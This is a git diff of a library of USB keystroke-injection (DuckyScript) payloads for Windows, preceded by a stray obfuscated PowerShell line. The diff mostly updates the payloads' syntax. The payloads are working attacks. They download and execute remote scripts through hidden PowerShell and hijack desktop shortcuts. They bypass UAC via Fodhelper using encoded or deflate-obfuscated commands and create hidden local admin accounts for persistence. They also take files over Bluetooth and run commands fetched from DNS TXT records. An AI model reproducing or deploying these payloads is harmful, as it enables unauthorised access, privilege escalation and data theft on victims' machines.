STRINGLN & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )

23
payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt
View File

@ -1,15 +1,20 @@
REM Title: Shortcut-Jacker
REM_BLOCK
Title: Shortcut-Jacker
Author: I am Jakoby
REM Author: I am Jakoby
Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
Target: Windows 10, 11
REM Target: Windows 10, 11
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <Your Shared link for the intended file>?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #URL?dl=1; invoke-expression $pl

39
payloads/library/execution/-OMG-UrAttaControl/UrAttaControl-Execute.txt
View File

@ -1,30 +1,31 @@
REM Title: UrAttaControl
REM_BLOCK
Title: UrAttaControl
Author: I am Jakoby
REM Author: I am Jakoby
Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
Target: Windows 10, 11
REM Target: Windows 10, 11
NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
END_REM
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
SHIFT ENTER
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
SHIFT ENTER
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER
STRINGLN $url = #URL
STRINGLN $Payload = (Invoke-WebRequest $url'?dl=1').Content
STRINGLN ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
STRINGLN exit

99
payloads/library/execution/Add_Local_Admin/payload.txt
View File

@ -1,71 +1,36 @@
REM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: Administrator PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM_BLOCK
Title: Add_Local_Admin
Author: LulzAnarchyAnon
Description: Administrator PowerShell is opened, and a script runs that adds a Local Admin User.
Target: Windows 10 PowerShell
Props: Darren Kitchen, and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI x
DELAY 500
a
DELAY 500
STRING a
ALT y
Delay 2000
STRING $Username = "Admin2"
DELAY 2000
ENTER
STRING $Password = "password"
DELAY 2000
ENTER
STRING $group = "Administrators"
DELAY 2000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
ENTER
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
DELAY 5000
ENTER
STRING if ($existing -eq $null) {
DELAY 2000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING {
DELAY 2000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
ENTER
STRING }
DELAY 2000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
ENTER
DELAY 1000
STRING exit
DELAY 100
ENTER
STRINGLN $Username = "Admin2"
STRINGLN $Password = "password"
STRINGLN $group = "Administrators"
STRINGLN $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
STRINGLN $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
STRINGLN if ($existing -eq $null) {
STRINGLN Write-Host "Creating new local user $Username."
STRINGLN & NET USER $Username $Password /add /y /expires:never
STRINGLN Write-Host "Adding local user $Username to $group."
STRINGLN & NET LOCALGROUP $group $Username /add
STRINGLN }
STRINGLN {
STRINGLN Write-Host "Setting password for existing local user $Username."
STRINGLN $existing.SetPassword($Password)
STRINGLN }
STRINGLN Write-Host "Ensuring password for $Username never expires."
STRINGLN & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
STRINGLN exit

34
payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt
View File

@ -1,10 +1,14 @@
REM Title: Admin who never sleeps
REM Desc: Adds a local hidden admin user and sets power settings to never sleep.
REM Author: UberGuidoZ
REM Target: Windows (local admin required)
REM_BLOCK
Title: Admin who never sleeps
Desc: Adds a local hidden admin user and sets power settings to never sleep.
Author: UberGuidoZ
Target: Windows (local admin required)
END_REM
DUCKY_LANG US
DELAY 2000
REM Launch admin-level CMD prompt
DELAY 3000
GUI r
DELAY 1000
STRING cmd
@ -17,31 +21,25 @@ ENTER
DELAY 1500
REM Create local admin user WinSystem with pass Some-P@ssw0rd
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
ENTER
STRINGLN net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
DELAY 1500
REM Set WinSystem user pass to never expire, skip UAC, and hide the user
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
ENTER
STRINGLN wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
DELAY 1500
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
ENTER
STRINGLN powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
DELAY 1000
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
ENTER
STRINGLN Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
DELAY 1000
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
ENTER
STRINGLN powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
DELAY 1000
REM Set monitor timeouts to avoid noticing system is awake
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
ENTER
STRINGLN powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
DELAY 1000
REM Exit and enjoy your user whenever!
EXIT
STRINGLN exit

41
payloads/library/execution/Ai-Cable
View File

@ -1,41 +0,0 @@
REM Ai-Cable
REM Version 2.0
REM OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
REM Author: 0iphor13
REM This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
REM Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
DELAY 2000
REM Language only needed if you are not using an US layout
DUCKY_LANG de
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
MOUSE CLICK 1
DELAY 200
CTRL a
DELAY 200
CTRL x
DELAY 200
STRING I will create the payload for you :)
DELAY 3000
CTRL a
DELAY 200
CTRL v
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
ENTER
MOUSE CLICK 1

29
payloads/library/execution/Ai-Cable.txt Normal file
View File

@ -0,0 +1,29 @@
REM_BLOCK
Ai-Cable
Version 2.0
OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
Author: 0iphor13
This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
END_REM
DUCKY_LANG de
DELAY 2000
DEFAULT_DELAY 200
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
MOUSE CLICK 1
CTRL a
CTRL x
STRING I will create the payload for you :)
DELAY 3000
CTRL a
CTRL v
DELAY 1000
REPEAT 3 TAB
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
ENTER
MOUSE CLICK 1

141
payloads/library/execution/Blue_Harvester/payload.txt
View File

@ -1,133 +1,62 @@
REM_BLOCK
Title: Blue_Harvester
Author: LulzAnarchyAnon
REM Title: Blue_Harvester
READ BELOW BEFORE EXECUTING PAYLOAD...
REM Author: LulzAnarchyAnon
Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened is selected followed by all of the files in the folder being selected, and added to the transfer cue.
The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
Afterwards the selected files are transfered to the attackers device via bluetooth.
I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
NOTE: Make sure your device is Discoverable...
The cursor coordinates x,y on the screen may vary depending on device...
A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or USB Rubber Ducky (YOUR CHOICE)
Target: Windows 10
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM READ BELOW BEFORE EXECUTING PAYLOAD...
REM STAGE 1
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1
GUI
DELAY 50
STRING fsquirt
DELAY 200
ENTER
DELAY 500
GUI
STRINGLN fsquirt
SPACE
DELAY 500
REM STAGE 2
k
DELAY 500
STRING k
ENTER
DELAY 500
SPACE
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
REPEAT 8 TAB
ENTER
DELAY 500
CTRL a
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
ENTER
REM STAGE 3
GUI
DELAY 50
STRING powershell -windowstyle hidden
DELAY 1000
ENTER
DELAY 5000
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
GUI
STRINGLN powershell -windowstyle hidden
STRINGLN Add-Type -AssemblyName System.Windows.Forms
STRINGLN $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
STRINGLN $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
STRINGLN [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
MOUSE CLICK 1
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
ALT SPACE
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
REPEAT 6 DOWNARROW
ENTER

17
payloads/library/execution/DNS-TXT-Run/payload.txt
View File

@ -1,14 +1,15 @@
#-----------------------------------------------------------------------------------------------------------
REM_BLOCK
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
# This POC will get some commands that will play a message on a victims computer using Windows
# build speach engine. It also turns up the volume first, then speak out loud the text you want.
# build speach engine. It also turns up the volume first, then speak out loud the text you want.
# Author: Keld Norman / Twitter: @keld_norman
# Props: Google, RTFM, and trial and errors
# Version: 1.0
# Category: Execution
# Target: Windows10+ Powershell
# Attackmodes: HID
#-----------------------------------------------------------------------------------------------------------
# Quick Guide
#-----------------------------------------------------------------------------------------------------------
@ -37,12 +38,14 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
#-----------------------------------------------------------------------------------------------------------
# In OMG code that would be:
#-----------------------------------------------------------------------------------------------------------
END_REM
DEFINE #URL omg.yourdomain.com
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 1000
STRING CMD
ENTER
STRINGLN CMD
DELAY 500
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
ENTER
#-----------------------------------------------------------------------------------------------------------
STRINGLN for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" #OMG 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -

47
payloads/library/execution/FodCable - UAC Bypass/payload.txt
View File

@ -1,46 +1,7 @@
DELAY 500
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRING powershell
DELAY 250
ENTER
DELAY 2000
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC
GUI r
STRINGLN powershell
DELAY 200
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA
DELAY 200
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
DELAY 200
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
DELAY 200
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
DELAY 200
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
DELAY 200
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
DELAY 200
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
DELAY 200
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
DELAY 200
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
DELAY 200
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
DELAY 200
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
DELAY 200
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
DELAY 200
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
DELAY 200
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
DELAY 200
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
DELAY 200
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
DELAY 200
STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
DELAY 100
ENTER
STRINGLN powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIANwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBCADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit

30
payloads/library/execution/FodCable2 - UAC Bypass/payload.txt
View File

@ -1,22 +1,16 @@
REM FodCableII
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirements: OMG Firmware v.2.5 or higher
REM_BLOCK
FodCableII
Version 1.0
OS: Windows
Author: 0iphor13
Requirements: OMG Firmware v.2.5 or higher
Using FodHelper.exe to bypass UAC and get an elevated shell
END_REM
REM Using FodHelper.exe to bypass UAC and get an elevated shell
DELAY 500
DUCKY_LANG de
DELAY 1500
DELAY 2000
GUI r
STRINGLN powershell -NoP -NonI
DELAY 500
STRING powershell -NoP -NonI
DELAY 500
ENTER
DELAY 500
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
DELAY 200
ENTER
